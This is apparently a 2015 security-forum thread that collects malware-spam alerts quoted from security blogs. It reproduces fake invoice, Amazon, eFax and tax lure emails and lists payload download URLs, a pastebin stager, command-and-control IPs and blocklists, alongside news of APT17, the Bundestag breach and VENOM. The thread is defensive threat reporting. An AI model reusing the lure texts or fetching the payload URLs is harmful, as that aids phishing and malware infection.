As previously mentioned, we changed entity to a limited company on 1st December 2014. We are keen to close all the old accounts down, for both tax and year end reasons. We would be very grateful in your assistance in settling the outstanding.
If you need any copy invoices please do not hesitate to contact us
Regards,
Victoria Barnett
-Or-
Good Afternoon,
Please see attached the copy of the remittance.
Please can you send a revised statement so we can settle any outstanding balances.
Kind Regards,
Ingrid Hammond
13 May 2015: ron.schorr_AD8441271C40.doc | xerox.device1_D9A263380D.doc
Current Virus total detections: 0/56* | 0/56** both macros eventually download 91.226.93.110/bt/get1.php which is saved as crypted.120.exe (virus Total***) after going through a download from pastebin which gives the download location in encoded form... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/c3c9719bf550a1ec5dddfd15af406b4176c026382fceb272da6301eb05b81ba7/analysis/1431512840/
** https://www.virustotal.com/en/file/bdbd7de4976ba29bb7a72da0b3aea9ccbe55b47b3e130fdef5b06162a4fd048b/analysis/1431512565/
*** https://www.virustotal.com/en/file/dd128459932149be4306fef15bc543c9b1f165a45a69e5e8de1f1f7726122a58/analysis/1431512119/
... Behavioural information
TCP connections
159.253.20.116: https://www.virustotal.com/en/ip-address/159.253.20.116/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
91.226.93.110: https://www.virustotal.com/en/ip-address/91.226.93.110/information/
- http://blog.dynamoo.com/2015/05/malware-spam-need-your.html
13 May 2015
"... Recommended blocklist:
46.36.217.227
91.226.93.110 "
___
Fake 'ACH' SPAM - PDF malware
- http://myonlinesecurity.co.uk/ach-bank-account-information-form-fake-pdf-malware-2/
13 May 2015 - "'ACH – Bank account information form' pretending to come from Kris Longoria <Kris.Longoria@ jpmchase .com> with a zip attachment is another one from the current bot runs... The email looks like:
Please fill out and return the attached ACH form along with a copy of a voided check.
Kris Longoria,
JPMorgan Chase
GRE Project Accounting
Vendor Management & Bid/Supervisor...
13 May 2015: Check_Copy_Void.zip: Extracts to: Check_Copy_Void.scr
Current Virus total detections: 9/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/936b982f7daa45b0071f7ac77f67d8dd1a87cd157d9ca998b9a74c1143163fbd/analysis/1431533270/
___
Fake 'Bond Alternative' SPAM - PDF malware
- http://myonlinesecurity.co.uk/surety-bond-alternative-chs-surety-fake-pdf-malware/
13 May 2015 - "'Surety Bond Alternative coming from random names and email addresses with a random named zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/Surety-Bond-Alternative.png
12 May 2015: XwJ4IR8V0F1ar.zip: Extracts to: invoice_ghrt6h65h_fwefw3.exe
Current Virus total detections: 2/56* (one example only, all these have different sha256 # and a random selection of file names). This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/376ac2fa286ae1fad7af5073bb360f610c54d25b6f0977280b597a3d6b80cd33/analysis/1431536544/
___
Dyre Botnet using malicious Word Macros
- http://www.threattracksecurity.com/it-blog/dyre-botnet-using-malicious-microsoft-word-macros/
May 11, 2015 - "The Dyre group, a major malware spam producer, has changed their initial malware dropper to utilize Microsoft Word document -macros- instead of the usual executable types, such as .exe files contained in a .zip. Dyre’s Hedsen spambot*, responsible for the bulk of Upatre emails we’ve been tracking, now uses a template to send infected-macro Word files as spam attachments in hopes that the end user will click the attached .doc file and infect their system. This is a noticeable change in behavior for this particular spambot. As always, users should -disable- Macros in Office documents, and avoid the temptation to open suspicious attachments..."
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2015/05/Macro.jpg
* http://www.threattracksecurity.com/it-blog/dyre-now-using-signed-certificates-https/
"... Dyre was increasing its target range and altering the type of spambots it uses..."
** http://www.threattracksecurity.com/it-blog/dyre-targets-more-websites/
:fear::fear: :mad:
AplusWebMaster
2015-05-15, 12:28
FYI...
Fake 'Self Bill' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/reliance-scrap-metal-self-bill-sb026336-attached-word-doc-or-excel-xls-spreadsheet-malware/
15 May 2015 - "'Self Bill SB026336 Attached' pretending to come from Reliance Scrap Metal <enquiries@ reliancescrapmetal .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please Find Enclosed Self Bill Number SB026336 Dated 07/05/2015
C Phillips
enquiries@ reliancescrapmetal .com
15 May 2015 : Attachment.doc - Current Virus total detections: 0/56* which downloads bwsherwood .com/34/140.exe (VirusTotal**). There will be other download locations... All locations will deliver the same malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ac9ed15b125fd785ee42419f80017701f08ab7d06adbbf46cf74081a3666c72d/analysis/1431678745/
** https://www.virustotal.com/en/file/dafb9fbd4ef5b046fee44a21460ada8b5cc8079f8b84fee275a29b01097bd715/analysis/1431677370/
... Behavioural information
TCP connections
151.236.216.254: https://www.virustotal.com/en/ip-address/151.236.216.254/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
bwsherwood .com: 69.49.101.51: https://www.virustotal.com/en/ip-address/69.49.101.51/information/
___
Fake email Invoices April 2015 with attached malicious Word file
- http://blog.mxlab.eu/2015/05/15/fake-email-invoices-april-2015-with-attached-malicious-word-file/
May 15, 2015 - "... intercepted a new trojan distribution campaign by email with the subjects like:
Financial information: Invoices April 2015
Important notice: Invoices April 2015
Important information: Invoices April 2015
Need your attention: Invoices April 2015
This email is sent from the -spoofed- address and has the following body:
Congratulations
Hope you are well
Please find attached the statement that matches back to your invoices.
Can you please sign and return.
Robin Wolfe
Dear Sir/Madam,
I trust this email finds you well,
Please see attached file regarding clients recent bill. Should you need further assistances lease feel free to email us.
Best Regards,
Sophia Watts
Accounts Receivables
Good morning
Hi,
Please find attached a recharge invoice for your broadband.
Many thanks,
Tabatha Murphy
The 49kB large attached file is named veizaioj_87B9A16BB5.doc (characters will vary) is a malicious Word file with embedded macro that will download -other- malware on the system. The Word file is labelled as Malware!9f6e by 1 of the 57 AV engines at Virus Total*..."
* https://www.virustotal.com/en/file/fbc58f82f9231d8ee7598aa7da82a2f67e5f8d85297bd12373a5f2f29e738314/analysis/
___
Unknown hacks attack German parliament data network
- http://www.reuters.com/article/2015/05/15/germany-cybersecurity-idUSL5N0Y63P720150515
May 15, 2015 - "Unknown hackers have attacked the German Bundestag lower house of parliament's computer system, a parliamentary spokeswoman said on Friday. German news magazine Der Spiegel's online edition had earlier said that the internal data network had been subject to an attack. It said experts had noticed several days ago that unknown attackers had tried to get into the data network. At almost the same time experts from Germany's domestic intelligence agency (BfV) at the government's cyber defence centre noticed the spying attempt and warned the Bundestag administration, the report said. 'There was an attack on the Bundestag's IT system', parliamentary spokeswoman Eva Haacke said, giving no further details. 'Experts from the Bundestag and the BSI (the German Federal Office for Information Security) are working on it'. In January, German government websites, including Chancellor Angela Merkel's page, were hacked in an attack claimed by a group demanding Berlin end support for the Ukrainian government, shortly before their leaders were to meet."
- http://www.reuters.com/article/2015/05/16/germany-cybersecurity-idUSL5N0Y70HH20150516
May 16, 2015 - "The German Bundestag lower house of parliament is trying to repair its computer system after a hacking attack but there are no indications yet that hackers accessed information, a parliamentary spokeswoman said on Saturday. The Bundestag is analysing what happened and experts from the Bundestag administration and the BSI (the German Federal Office for Information Security) are working to repair the system, the spokeswoman said..."
___
Cyberattack on Penn State said to have come from China
- http://www.reuters.com/article/2015/05/15/pennstate-dataprotection-idUSL3N0Y66PD20150515
May 15, 2015 - "Pennsylvania State University said on Friday that -two- cyberattacks at its College of Engineering, including one in 2012 that originated in China, compromised servers containing information on about 18,000 people. Penn State, a major developer of technology for the U.S. Navy, said there was no evidence that research or personal data such as social security or credit card numbers had been stolen. Cybersecurity firm Mandiant has confirmed that at least one of the two attacks was carried out by a "threat actor" based in China, Penn State said. The source of the other attack is still being investigated. Penn State was alerted about a breach by the Federal Bureau of Investigation in November, Penn State executive vice president Nicholas Jones said in a statement. Mandiant, the forensic unit of FireEye Inc, discovered the 2012 breach during the investigation. Penn State's Applied Research Laboratory spends more than $100 million a year on research, with most of the funding coming from the U.S. Navy..."
- http://it.slashdot.org/story/15/05/15/1725244/penn-state-yanks-engineering-network-from-internet-after-china-based-attack
May 15, 2015 - "Penn State's College of Engineering has disconnected its network* from the Internet in response to two sophisticated cyberattacks – one from a what the university called a "threat actor based in China" – in an attempt to recover all infected systems. The university said there was no indication that research data or personal information was stolen in the attacks, though usernames and passwords -had- been compromised.*"
* http://news.psu.edu/story/357656/2015/05/15/administration/college-engineering-network-disabled-response-sophisticated
___
Chinese snoops hid Malware commands On MS TechNet
- http://www.forbes.com/sites/thomasbrewster/2015/05/14/chinese-hackers-abuse-microsoft-site/
May 14, 2015 - "Hackers often try to hide their tracks and ensure their illicit operation is never taken down by hosting pieces of their infrastructure on websites owned by legitimate companies. Usually that’s Twitter, Facebook, Google or other huge, publicly-editable and accessible services. According to security firm FireEye*, Chinese digital spies chose an ideal yet risky target for storing slices of their command and control functions: TechNet, a Microsoft site dedicated to security and IT support. Though TechNet itself was not compromised, the so-called APT17 hackers left encoded IP addresses used to send updates and commands to the group’s ‘BLACKCFFEE’ malware** in legitimate Microsoft TechNet profile pages and forum threads. The encoding would have made it more difficult to determine the true domain used by the attackers. FireEye and Microsoft worked to block the attackers’ accounts from accessing their profiles, whilst blocking the malicious activity stemming from the site.
** https://a248.e.akamai.net/f/1015/2073/5m/blogs-images.forbes.com/thomasbrewster/files/2015/05/Screen-Shot-2015-05-14-at-11.18.58.png
The APT17 crew, which had previously used search engines Google and Bing to store their command and control domains, but abusing Microsoft’s TechNet was especially smart, as most businesses rely on using Microsoft services every day. Blocking them would probably cease business operations. “Even with knowledge and detection, blocking traffic to Microsoft sites is impossible to do as every business needs access to their site. Hiding in plain sight is becoming more and more popular as it’s both hard to find and impossible to block,” said Jason Steer, chief security strategist for FireEye in EMEA. “This evolution of technique really is the response from hackers to keep one step ahead of law enforcement agencies. As hackers realised law enforcement can track back, they have had to evolve their tools and techniques from plain text instructions on an IP address in China, to encoding instructions, to using popular websites to ensure their network remains up for as long as possible and undetected for as long as possible.” The APT17 crew have a penchant for playing with western tech companies. FireEye believes they were responsible for the hit on security firm Bit9 in 2013. They also targeted US government entities, the defense industry, law firms, information technology companies and mining organisations."
* https://www.fireeye.com/blog/threat-research/2015/05/hiding_in_plain_sigh.html
May 14, 2015
> https://www.fireeye.com/content/dam/fireeye-www/blog/images/Coercive/apt17-graphic.jpg
- https://atlas.arbor.net/briefs/index#-181898354
May 14, 2015
> http://www.net-security.org/malware_news.php?id=3038
:fear::fear: :mad:
AplusWebMaster
2015-05-18, 12:45
FYI...
Fake 'Amazon Order' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/amazon-co-uk-order-details-89920-02119-38881-73110-word-doc-or-excel-xls-spreadsheet-malware/
18 May 2015 - "'Order Details 89920-02119-38881-73110' pretending to come from Amazon .co .uk <order@ anazon .co .uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... Amazon... does -not- send word doc or pdf attachments to emails so this is obviously a spoof designed to either infect you or steal information...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/Order-Details-89920-02119-38881-73110.png
18 May 2015 : ORD-89920-02119-38881-73110.doc - Current Virus total detections: 3/57*
... which downloads infraredme .com/556/455.exe (Virus Total**). There will be other download locations but they all deliver the same Dridex banking Trojan malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0707a5113d517fc1f96784173bc3865521a448ea48e2347e76d63e9cb0752a75/analysis/1431938632/
** https://www.virustotal.com/en/file/5ba1bed8c0ee977b7b2ecd33925883feded97f553f4569e2557afda5737cc77e/analysis/1431939201/
... Behavioural information
TCP connections
185.15.185.201: https://www.virustotal.com/en/ip-address/185.15.185.201/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
infraredme .com: 64.29.151.221: https://www.virustotal.com/en/ip-address/64.29.151.221/information/
___
Fake 'picture message' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/heres-a-picture-message-youve-been-sent-from-07711888963-word-doc-or-excel-xls-spreadsheet-malware/
18 May 2015 - "An email saying 'Here’s a picture message you’ve been sent from 07711888963' with -no- subject pretending to come from +447711862559@mediamessaging .o2 .co .uk (random phone numbers) with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/Heres-a-picture-message-youve-been-sent-from-07711888963.png
18 May 2015: PM8963.doc - Current Virus total detections: 3/57**
... the -same- malware downloader and downloading the -same- Dridex banking Trojan as today’s other word doc malware Amazon .co .uk Order Details 89920-02119-38881-73110 – word doc or excel xls spreadsheet malware* ..."
* http://myonlinesecurity.co.uk/amazon-co-uk-order-details-89920-02119-38881-73110-word-doc-or-excel-xls-spreadsheet-malware/
** https://www.virustotal.com/en/file/0707a5113d517fc1f96784173bc3865521a448ea48e2347e76d63e9cb0752a75/analysis/1431940970/
___
Fake multiple Invoice SPAM - malicious attachments
- http://blog.dynamoo.com/2015/05/malware-spam-your-reasoning-stands-in.html
18 May 2015 - "This -fake- financial spam run is similar to this one last week*, and comes with a malicious attachment.
From: Aida Curry
Date: 18 May 2015 at 11:40
Subject: Your reasoning stands in need
Good Afternoon,
We have attained a reimbursement from you for the draft of £ 2909. Please would you secure me with a remittance, in order for me to reconcile the statement.
I will be sending you a pronouncing of outstanding invoices tomorrow, the entire quantum of outstanding is £ 5893 less the 1 draft received making a whole outstanding of £ 2984. We would very much appreciate settlement of this.
As previously mentioned we reversed to a limited company on 1st December 2014. We are desire to conclude all the old checks down, for both tax and year end reasons. We would be very grateful in your assistance in eliciting the outstanding.
If you need any application of bills please do not hesitate to contact us
Regards,
Aida Curry
-------------------
From: Cornelius Douglas
Date: 18 May 2015 at 11:39
Subject: Your reasoning stands in need
Good morning
Please find attached a remittance advice, relating to a outpayment made to you.
Many thanks
Regards,
Cornelius Douglas
Seniour Finance Assistant
-------------------
From: Jewell Shepard
Date: 18 May 2015 at 11:37
Subject: Have a need in your thought
Please, see the attached similar of the remittance.
Please, can you remit a revised pronouncing so we can settle any outstanding balances.
Kind Regards,
Jewell Shepard
Subjects spotted so far are:
In want of your concern
Your reasoning stands in need
Have a need in your thought
Vital announcement 561335
Your advertence stands in need
Grand advert 482209
Important notice 540897
In want of your regarding
In want of your concern
Your reasoning stands in need
Wish to know your thought
Your cognizance is in great necessity
Need your consideration
There seem to be several different attachments, but for the sake of simplicity I have looked at just one. The Hybrid Analysis report shows this this is a MIME attachment that downloads and executes a script from pastebin[.]com/download.php?i=C5KGsRX3 which in turn downloads a malicious executable from 193.26.217[.]220:80/bt/get3.php (Servachok LTD, Russia) which is saved as crypted.120.exe. This executable has a VirusTotal detection rate of 4/57**. The Malwr and Hybrid Analysis reports indicates traffic to 5.63.154.228 (Reg.Ru, Russia) and also shows a dropped Dridex DLL with a detection rate of 3/57***."
Recommended blocklist:
5.63.154.228
193.26.217.220 "
* http://blog.dynamoo.com/2015/05/malware-spam-need-your.html
** https://www.virustotal.com/en/file/ffc1f577b754a897bd88fdb67801ea3f87a2bc858700f36dd71e3b67bf0d262d/analysis/1431946975/
*** https://www.virustotal.com/en/file/680a1511d78da0229596a519d194aaa2a885e88148323bc7820e9b143665f76e/analysis/1431947900/
- http://myonlinesecurity.co.uk/some-financial-transaction-word-doc-or-excel-xls-spreadsheet-malware/
18 May 2015
> https://www.virustotal.com/en/file/ffc1f577b754a897bd88fdb67801ea3f87a2bc858700f36dd71e3b67bf0d262d/analysis/1431950899/
... Behavioural information
TCP connections
178.255.83.2: https://www.virustotal.com/en/ip-address/178.255.83.2/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
___
VENOM vulnerability
- https://blogs.oracle.com/security/entry/security_alert_cve_2015_3456
May 15, 2015 - "Oracle just released Security Alert CVE-2015-3456* to address the recently publicly disclosed VENOM vulnerability, which affects various virtualization platforms. This vulnerability results from a buffer overflow in the QEMU's virtual Floppy Disk Controller (FDC). While the vulnerability is not remotely exploitable without authentication, its successful exploitation could provide the malicious attacker, who has privileges to access the FDC on a guest operating system, with the ability to completely take over the targeted host system. As a result, a successful exploitation of the vulnerability can allow a malicious attacker with the ability to escape the confine of the virtual environment for which he/she had privileges for... Oracle has decided to issue this Security Alert based on a number of factors, including the potential impact of a successful exploitation of this vulnerability, the amount of detailed information publicly available about this flaw, and initial reports of exploit code already “in the wild.” Oracle further recommends that customers apply the relevant fixes as soon as they become available...
The list of Oracle products that may be affected by this vulnerability is published at:
- http://www.oracle.com/technetwork/topics/security/venom-cve-2015-3456-2542653.html "
- https://isc.sans.edu/diary.html?storyid=19701
2015-05-16 - "... This vulnerability is important because it has the potential to affect a significant portion of the virtualization platforms that are in common use today, but there is no reason to panic.
* The vulnerability cannot be compromised remotely, nor is it possible to remotely scan for this vulnerability.
* In order for the attacker to even attempt to exploit the vulnerability they need to have shell level access as an administrator level to a virtualized guest.
* While a proof of concept exists that exploits the vulnerability, nobody has demonstrated any practical use of the exploit.
* Patches are available for all affected virtualization platforms..."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3456
Last revised: 05/14/2015
7.7 - (HIGH)
:fear::fear: :mad:
AplusWebMaster
2015-05-19, 15:13
FYI...
Fake 'PO :5182015' SPAM - zipped malware
- http://myonlinesecurity.co.uk/shuilingroup-com-po-5182015-malware/
19 May 2015 - "'PO :5182015' pretending to come from shuiling <shuilingroup .com > with a zip attachment is another one from the current bot runs... The email looks like:
Please kindly find the attached file for the new Order we want to place in your esteem company
Kindly send your proforma invoice with your banking information, so that we will start with the needful
Thanks and regards
ATTILIO PASCUCCI
ATTEX S.R.L.
VIA ADIGE, 4 – 22070 LUISAGO – CO (ITALY)
TEL. 0039 031 921648 – FAX 0039 031 3540133
REG. IMPRESE COMO – COD.FISC. – PARTITA IVA: 01542400138
19 May 2015: PO 5182015.zip: Extracts to: PO 5182015.exe
Current Virus total detections: 15/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/7ba159e1edb95dacd9bef9ddfa086c8f058aedc9a54bee6a1365b2ace2dd1fb1/analysis/1431986200/
... Behavioural information
TCP connections
186.202.127.118: https://www.virustotal.com/en/ip-address/186.202.127.118/information/
77.88.21.11: https://www.virustotal.com/en/ip-address/77.88.21.11/information/
93.158.134.3: https://www.virustotal.com/en/ip-address/93.158.134.3/information/
___
Fake 'Tax Refund' Phish ...
- http://myonlinesecurity.co.uk/lloyds-bank-refund-2014-tax-refund-phishing/
19 May 2015 - "An email received with a subject of 'Lloyds Bank Refund' -or- 'refund' -or- '2014 Tax Refund' pretending to come from Lloyds Bank. Some of of the major common subjects in a phishing attempt are Tax returns or Bank refunds, especially in UK, you need to submit your Tax Return online. This one only wants your personal bank log in details...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/lloyds-bank-tax-refund-phish.png
If you are unwise enough to follow the link you see a webpage looking like the genuine Lloyds log in page, look carefully at the -url- in the top bar and you can see it isn’t Lloyds at all but a -fake- site:
- http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/lloyds-bank-tax-refund-phish_webpage1.png
If you still haven’t realised that it is a -phishing- attempt and give them your username & password, you will be sent to the next page which asks for your memorable information. You then get -bounced- on to the genuine Lloyds Bank site. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___
Fake 'Tax increase alert' SPAM – PDF malware
- http://myonlinesecurity.co.uk/tax-increase-alert-fake-pdf-malware/
19 May 2015 - "'Tax increase alert' -or- 'adjustment guidance' are 2 of the subjects that appear in a whole series of mal-spam emails with the basic subject of VAT increases or changes that are being spammed out. They come with a random named zip attachment coming from random senders and random email addresses is another one from the current bot runs... The name of the alleged sender does NOT match the name in the body of the email. Some of the subjects seen in this series of mal-spam emails are:
Tax increase alert, adjustment guidance, adjustment report, adjustment notice, change guidance, Custom increase notification, Custom change alert, Duties increase notification, Toll increase notification, Tax change reminder, Levy increase guidance, Duties adjustment alert, change notification, Toll change report and loads of other similar variations on this tax theme... The email looks like:
We inform you that VAT increases from Wednesday.
View the document below.
Remeber that levy values to be settled to the treasury are going to be reevaluated.
Susan Lewis
Senior Consultant
-Or-
Be noted that VAT doubles until Wednesday.
Observe the act enclosed.
Do not forget that tax amounts to be paid to the state will be reestimated.
Rebecca Morgan
-Or-
Tax Consultant
Be noted that VAT increases on Friday.
Observe the file below.
Note that tax amounts to be paid to the treasury will be reevaluated.
Rebecca Nelson
Chief accountant
-Or-
Please be informed that VAT alters until Tuesday.
Observe the file attached.
Remeber that sums to be paid to the state are going to be reevaluated.
Susan Jackson
Tax authority
19 May 2015: Doc#844931.zip: Extracts to: fax2_info.exe
Current Virus total detections: 3/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c7d2629f3d74208c72cee24d9822ec58e3fed9401e8fc4276fdd05f15d5b7d5f/analysis/1432035348/
___
Fake 'eFax msg' SPAM - malware links
- http://blog.dynamoo.com/2015/05/malware-spam-australian-taxation-office.html
19 May 2015 - "Apparently the Australian Taxation Office thinks I have a fax.. or perhaps it is something more sinister?
From: Australian Taxation Office [noreply @ ato .gov .au]
Date: 19 May 2015 at 12:48
Subject: eFax message - 2 page(s)
Fax Message [Caller-ID: 408-342-0521]
You have received a 2 pages fax at 2015-05-19 08:18:16 AM EST.
* The reference number for this fax is
min2_did16-0884196800-3877504043-49.
View this fax using your PDF reader...
Predictably, the link leads to a malicious download (this time at storage-ec2-24.sharefile .com) named Fax_00491175.zip and containing in turn a malicious executable Fax_00491175.scr. This executable has a detection rate of 5/57*. Automated analysis tools... shows that it downloads a further component from:
http ://employmentrisk .com/images/1405uk77.exe
In turn, this has a detection rate of 4/57** and the Hybrid Analysis report indicates that it tries to communicate with 194.28.190.183 (AgaNet Agata Goleniewska, Poland).
Recommended blocklist:
employmentrisk .com
194.28.190.183 "
* https://www.virustotal.com/en/file/ea62d16f13d14eeda2bdefd7cfebf7c77a9a3bb11a5886440cfc669a6f9ff629/analysis/1432038054/
** https://www.virustotal.com/en/file/ddb2a2f6d5f30f74b46311e8d976334037af5043999c29c68d96b9a399b491bb/analysis/1432038513/
employmentrisk .com: 74.116.2.117: https://www.virustotal.com/en/ip-address/74.116.2.117/information/
storage-ec2-24.sharefile .com: 52.0.190.130: https://www.virustotal.com/en/ip-address/52.0.190.130/information/
eFax Corporate Spam
- http://threattrack.tumblr.com/post/119358539478/efax-corporate-spam
May 19, 2015 - "Subjects Seen:
eFax message - 3 page(s)
Typical e-mail details:
Fax Message [Caller-ID: 626-271-6819]
You have received a 3 pages fax at 2015-05-19 08:18:18 AM EST.
* The reference number for this fax is
min2_did48-5711163227-0231815252-98.
View this fax using your PDF reader.
Screenshot: https://40.media.tumblr.com/cc50f039e1e8fd8c09231d50c07b380c/tumblr_inline_nolmajsYzj1r6pupn_500.png
Malicious URLs
storage-usw-8.sharefile.com/download.ashx?dt=dtba0aacb3cd344005be90d949470aa333&h=9Ueg3YdEIMuDH72YnA29c7h2EL7zh355nI387gxb7Kc%3d
Malicious File Name and MD5:
Fax_00491175.scr (a6aa82995f4cb2bd29cdddedd3572461)
Tagged: eFax, Upatre
___
Bad taste left in Angler EK by MBAE
- https://blog.malwarebytes.org/exploits-2/2015/05/exploit-kit-authors-give-up-on-malwarebytes-users/
May 19, 2015 - "... as discovered by Kafeine*, the latest version of Angler EK... also checks to see if either Malwarebytes Anti-Malware or Anti-Exploit are installed on the target system... If Malwarebytes software is installed, then the exploit kit will silently exit and not even attempt to launch further exploits or malware..."
* http://malware.dontneedcoffee.com/2014/10/cve-2013-7331-and-exploit-kits.html?q=CVE-2013-7331
Malwarebytes Anti Exploit - Free: https://www.malwarebytes.org/antiexploit/
___
How much money do cyber crooks collect via crypto ransomware?
- http://net-security.org/malware_news.php?id=3042
19.05.2015 - "FireEye researchers* have calculated that the cybercriminals wielding TeslaCrypt and AlphaCrypt have managed to extort $76,522 from 163 victims in only two months..."
* https://www.fireeye.com/blog/threat-research/2015/05/teslacrypt_followin.html
___
Bitly Imitation leads to Malware...
- https://blog.malwarebytes.org/security-threat/2015/05/bitly-imitation-leads-to-malware-download/
May 18, 2015 - "URL shortening services can be a marketing person’s and social media buff’s best friend. However, they can become a worry for users who are conscious about the security of their systems and personal information. Not only do these services trim down the character count of a URL while monitoring clicks, online -criminals- also use such services to mask malicious URLs. Among the URL shorteners available online, Bitly remains one of the three most popular brands, alongside Goo.gl and Ow.ly. Although the bit.ly URL has been in service since 2008, we’re only beginning to see several -bogus- iterations of it being used in the wild. We’ve seen a number of accounts on YouTube and others sharing various links to game cracks from the imitation Bitly URL, btly[DOT]pw... Elsewhere, another imitation Bitly link — this time, btly[DOT]org—is said to be used in a spam campaign that led recipients to a fake BBC site that advertises questionable Garcinia Cambogia dietary supplements. Please be reminded that the official website for Bitly where users can visit to shorten URLs is https ://bitly .com. Shortened URLs always begin with bit. ly. Everything else that resembles the real thing may need to be ignored, reported, and/or blacklisted."
:fear::fear: :mad:
AplusWebMaster
2015-05-21, 13:16
FYI...
Fake 'Invoice# 2976361' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/05/malware-spam-invoice-2976361-attached.html
21 May 2015 - "So far I have only seen one sample of this. The sender and subject may vary.
From: PGOMEZ@polyair .co .uk
Date: 21 May 2015 at 08:58
Subject: Invoice# 2976361 Attached
Invoice Attached - please confirm..
Attached is a malicious file with the not-very-imaginative name 00001.doc [VT 4/56*] which contains this malicious macro [pastebin] that downloads a component from the following location:
http ://mercury.powerweave .com/72/11.exe
This download site is hosted on 50.97.147.195 (Softlayer Technologies, US / Powerweave Software Services, India), although be aware that -other- versions of the macro may download from other locations. This file is saved as %TEMP%\ribasiml.exe and has a VirusTotal detection rate of 5/57**. Automated analysis tools... show attempted communications with the following IPs:
78.24.218.186 (TheFirst-RU, Russia)
78.46.60.131 (Hetzner, Germany)
87.236.215.151 (OneGbits, Lithuania)
94.242.58.146 (Fishnet Communications, Russia)
130.208.166.65 (The University of Iceland, Iceland)
176.31.28.250 (OVH, France / Bitweb LLC, Russia)
185.12.95.191 (RuWeb, Russia)
The Malwr report shows that it drops a Dridex DLL with a detection rate of 4/57***.
Recommended blocklist:
78.46.60.131
87.236.215.151
94.242.58.146
130.208.166.65
176.31.28.250
185.12.95.191
50.97.147.195 "
* https://www.virustotal.com/en/file/7435b4478e8c0bf3fef5fdf43998e5ba4ce646a03376ad2c278399437c5185e5/analysis/1432196986/
** https://www.virustotal.com/en/file/41eab1c139eda5740b44ea1dcf82cc427526027a60ada2c6f887a2e74b761c4e/analysis/1432197071/
*** https://www.virustotal.com/en/file/5916c159345858808da9b709349ab6364605da0a27c0392df0cc78ba824598e7/analysis/1432198215/
- http://myonlinesecurity.co.uk/invoice-2976361-attached-word-doc-or-excel-xls-spreadsheet-malware/
21 May 2015
> https://www.virustotal.com/en/file/7435b4478e8c0bf3fef5fdf43998e5ba4ce646a03376ad2c278399437c5185e5/analysis/1432194451/
000001.DOC
mercury.powerweave .com: 50.97.147.195: https://www.virustotal.com/en/ip-address/50.97.147.195/information/
___
Fake 'Travel order confirmation' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/travel-order-confirmation-0300202959-word-doc-or-excel-xls-spreadsheet-malware/
21 May 2015 - "'Travel order confirmation 0300202959' pretending to come from overseastravel@ caravanclub .co .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear Customer,
Thank you for your travel order.
Please find attached your booking confirmation which you should take with you on your trip. Please note we no longer send tickets for overseas travel bookings.
Now you have booked your trip why not let The Club help you make the most of your stay?
Did you know The Club has a wide selection of travel advice on the website as well as directions to all our overseas sites?
Want some inspiration on more sites across Europe? Take a look at our Caravan Europe Guides.
If you’ve not already taken out holiday insurance why not let The Club give you a Red Pennant quote online .
Yours sincerely
The Caravan Club
This email is sent from the offices of The Caravan Club, a company limited by guarantee (Company Number: 00646027). The registered office is East Grinstead House, London Road, East Grinstead, West Sussex, RH19 1UA...
21 May2015 : Travel Order Confirmation – 0300202959.doc
Current Virus total detections: 4/57* ... downloads -same- Dridex malware as today’s other word doc malspam run Invoice# 2976361 Attached – word doc or excel xls spreadsheet malware:
- http://myonlinesecurity.co.uk/invoice-2976361-attached-word-doc-or-excel-xls-spreadsheet-malware/
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/c85b4fd1dc7e487995d975d9146ba7d85566bfbbe283e6af692643517eaaa2ef/analysis/1432197951/
- http://blog.dynamoo.com/2015/05/malware-spam-travel-order-confirmation.html
21 May 2015 - "... Travel Order Confirmation - 0300202959.doc, however the payload seems to be identical to the one found in this earlier spam run*."
* http://blog.dynamoo.com/2015/05/malware-spam-invoice-2976361-attached.html
___
Fake 'Pampered Chef' SPAM – PDF malware
- http://myonlinesecurity.co.uk/recipes-for-your-new-pampered-chef-baker-fake-pdf-malware/
21 May 2015 - "'Recipes for your new Pampered Chef Baker' coming from random names and random email addresses with a zip attachment is another one from the current bot runs... The email looks like:
Hello!
I know you’ll love your new Pampered Chef baker! Thank you for your order.
Attached are Deep Covered Baker recipes.
Many Deep Covered Baker Recipes can also be made in the smaller, Round Covered Baker.
For microwave recipes, use half the ingredients and half the bake time suggested. For oven recipes, use half the
